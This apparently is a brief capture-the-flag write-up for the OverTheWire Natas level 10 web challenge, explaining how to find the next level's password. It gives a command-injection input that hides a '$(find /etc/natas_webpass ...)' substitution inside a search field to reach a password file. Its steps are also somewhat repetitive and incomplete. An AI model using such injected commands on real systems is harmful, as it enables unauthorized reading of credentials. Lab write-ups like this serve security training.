URL: http://natas10.natas.labs.overthewire.org
1. Objective
Find the password for natas 11
2. Method
Open the Website:
Visit the provided URL in your browser.
Check the Source Code:
Bypassing the Filter:
Use command substitution $(command) to bypass the filter.
Enter the search term a $(find /etc/natas_webpass -name natas11 2>/dev/null).
Explore the Output:
Examine the output, revealing files like index-source.html.
Find the natas11 Password File:
Use the command a $(find /etc/natas_webpass -name natas11 2>/dev/null).
Locate the Password:
The password for natas11 is revealed
>! /etc/natas_webpass/natas11:[Level 11 Password]
dictionary.txt:
dictionary.txt:African
dictionary.txt:Africans
dictionary.txt:AllahSuccess
Use the password to proceed to the next level
______________________________________
NthApostle
Comments
Post a Comment